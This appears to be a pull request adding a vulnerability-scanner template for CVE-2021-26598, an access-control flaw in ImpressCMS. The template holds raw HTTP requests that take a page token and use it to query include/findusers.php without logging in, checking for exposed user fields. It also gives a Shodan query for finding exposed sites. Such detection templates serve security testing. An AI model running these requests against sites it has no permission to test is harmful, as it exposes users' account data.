### PR TITLE
Create CVE-2021-26598.yaml

### DIFF
--- a/cves/2021/CVE-2021-26598.yaml
+++ b/cves/2021/CVE-2021-26598.yaml
@@ -8,6 +8,7 @@ info:
   reference:
     - https://hackerone.com/reports/1081137
     - http://karmainsecurity.com/KIS-2022-03
+    - https://github.com/ImpressCMS
     - https://nvd.nist.gov/vuln/detail/CVE-2021-26598
   metadata:
     shodan-query: http.html:"ImpressCMS"

--- a/cves/2021/CVE-2021-26598.yaml
+++ b/cves/2021/CVE-2021-26598.yaml
@@ -6,10 +6,12 @@ info:
   severity: medium
   description: ImpressCMS before 1.4.3 has Incorrect Access Control because include/findusers.php allows access by unauthenticated attackers (who are, by design, able to have a security token).
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2021-26598
-    - http://karmainsecurity.com/KIS-2022-03
     - https://hackerone.com/reports/1081137
-  tags: cve,cve2021,impresscms
+    - http://karmainsecurity.com/KIS-2022-03
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-26598
+  metadata:
+    shodan-query: http.html:"ImpressCMS"
+  tags: cve,cve2021,impresscms,unauth,cms
 
 requests:
   - raw:
@@ -32,6 +34,7 @@ requests:
         words:
           - 'last_login'
           - 'user_regdate'
+          - 'uname'
         condition: and
 
       - type: status

--- a/cves/2021/CVE-2021-26598.yaml
+++ b/cves/2021/CVE-2021-26598.yaml
@@ -1,0 +1,48 @@
+id: CVE-2021-26598
+
+info:
+  name: ImpressCMS - Incorrect Authorization
+  author: gy741,pdteam
+  severity: medium
+  description: ImpressCMS before 1.4.3 has Incorrect Access Control because include/findusers.php allows access by unauthenticated attackers (who are, by design, able to have a security token).
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-26598
+    - http://karmainsecurity.com/KIS-2022-03
+    - https://hackerone.com/reports/1081137
+  tags: cve,cve2021,impresscms
+
+requests:
+  - raw:
+      - |
+        GET /misc.php?action=showpopups&type=friend HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36
+
+      - |
+        GET /include/findusers.php?token={{token}} HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36
+
+    cookie-reuse: true
+    req-condition: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body_2
+        words:
+          - 'last_login'
+          - 'user_regdate'
+        condition: and
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        name: token
+        internal: true
+        group: 1
+        regex:
+          - "REQUEST' value='(.*?)'"
+          - 'REQUEST" value="(.*?)"'


### PR DESCRIPTION
### Template / PR Information

Hello,

 Added CVE-2021-26598.yaml

```
ImpressCMS before 1.4.3 has Incorrect Access Control because include/findusers.php allows access by unauthenticated attackers (who are, by design, able to have a security token).
```

I was able to create this template with the help of the pdteam.

Thank you to the pdteam.

- References: https://hackerone.com/reports/1081137

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO